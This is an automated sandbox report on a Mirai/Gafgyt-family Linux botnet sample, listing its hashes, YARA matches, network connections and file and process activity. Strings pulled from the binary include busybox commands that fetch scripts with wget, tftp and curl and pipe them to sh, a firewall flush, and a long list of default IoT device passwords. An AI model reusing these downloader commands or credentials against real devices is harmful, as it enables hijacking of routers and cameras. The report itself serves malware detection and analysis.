Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.x86_64.elf

Overview

General Information

Sample name:la.bot.x86_64.elf
Analysis ID:1591577
MD5:cfb666f58d6ad700f271fb3fd3df0692
SHA1:58d09f72c371b61677484f30b71048299b2f114d
SHA256:afb2e2df5a4b6cd2d4d00b4dbe1875e53d4f29352a525c820d54ab096b9007c6
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1591577
Start date and time:2025-01-15 05:12:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 58s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.x86_64.elf
Detection:MAL
Classification:mal84.troj.evad.linELF@0/1@3/0
  • VT rate limit hit for: ai.stackoverflow.libre
Command:/tmp/la.bot.x86_64.elf
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
la.bot.x86_64.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    la.bot.x86_64.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xf258:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    la.bot.x86_64.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xfa47:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    la.bot.x86_64.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xb732:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xb894:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    la.bot.x86_64.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0x1247a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    5458.1.0000000000400000.0000000000417000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5458.1.0000000000400000.0000000000417000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xf258:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      5458.1.0000000000400000.0000000000417000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xfa47:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      5458.1.0000000000400000.0000000000417000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xb732:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xb894:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      5458.1.0000000000400000.0000000000417000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
      • 0x1247a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
      Click to see the 11 entries
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: la.bot.x86_64.elfReversingLabs: Detection: 34%
      Source: la.bot.x86_64.elfVirustotal: Detection: 33%Perma Link
      Source: la.bot.x86_64.elfJoe Sandbox ML: detected
      Source: la.bot.x86_64.elfString: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68kG
      Source: global trafficTCP traffic: 192.168.2.13:56800 -> 188.166.182.194:10321
      Source: global trafficUDP traffic: 192.168.2.13:54219 -> 74.125.250.129:19302
      Source: /tmp/la.bot.x86_64.elf (PID: 5434)Socket: 127.0.0.1:43478Jump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 43.237.252.90
      Source: unknownTCP traffic detected without corresponding DNS query: 43.237.252.90
      Source: unknownTCP traffic detected without corresponding DNS query: 120.113.24.42
      Source: unknownTCP traffic detected without corresponding DNS query: 120.113.24.42
      Source: unknownTCP traffic detected without corresponding DNS query: 89.144.218.28
      Source: unknownTCP traffic detected without corresponding DNS query: 89.144.218.28
      Source: unknownTCP traffic detected without corresponding DNS query: 121.206.227.168
      Source: unknownTCP traffic detected without corresponding DNS query: 121.206.227.168
      Source: unknownTCP traffic detected without corresponding DNS query: 121.206.227.168
      Source: unknownTCP traffic detected without corresponding DNS query: 120.113.24.42
      Source: unknownTCP traffic detected without corresponding DNS query: 43.237.252.90
      Source: unknownTCP traffic detected without corresponding DNS query: 89.144.218.28
      Source: unknownTCP traffic detected without corresponding DNS query: 89.144.218.28
      Source: unknownTCP traffic detected without corresponding DNS query: 120.113.24.42
      Source: unknownTCP traffic detected without corresponding DNS query: 121.206.227.168
      Source: unknownTCP traffic detected without corresponding DNS query: 43.237.252.90
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: global trafficDNS traffic detected: DNS query: ai.stackoverflow.libre
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: la.bot.x86_64.elfString found in binary or memory: http:///curl.sh
      Source: la.bot.x86_64.elfString found in binary or memory: http:///wget.sh

      System Summary

      barindex
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd echo '#!/bin/sh' > check_pids.sh
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68kG
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: la.bot.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: classification engineClassification label: mal84.troj.evad.linELF@0/1@3/0

      Data Obfuscation

      barindex
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)File: /etc/configJump to behavior

      Persistence and Installation Behavior

      barindex
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File: /proc/5435/mountsJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /root/.cacheJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /root/.sshJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /root/.configJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /root/.localJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /tmp/.X11-unixJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /tmp/.Test-unixJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /tmp/.font-unixJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /tmp/.ICE-unixJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /tmp/.XIM-unixJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Directory: /etc/.javaJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3640/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3640/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3122/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3122/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3117/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3117/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3114/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3114/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/914/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/914/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5416/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5416/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5417/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5417/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/917/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/917/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5272/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/5272/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3134/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3134/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3375/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3375/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3132/statusJump to behavior
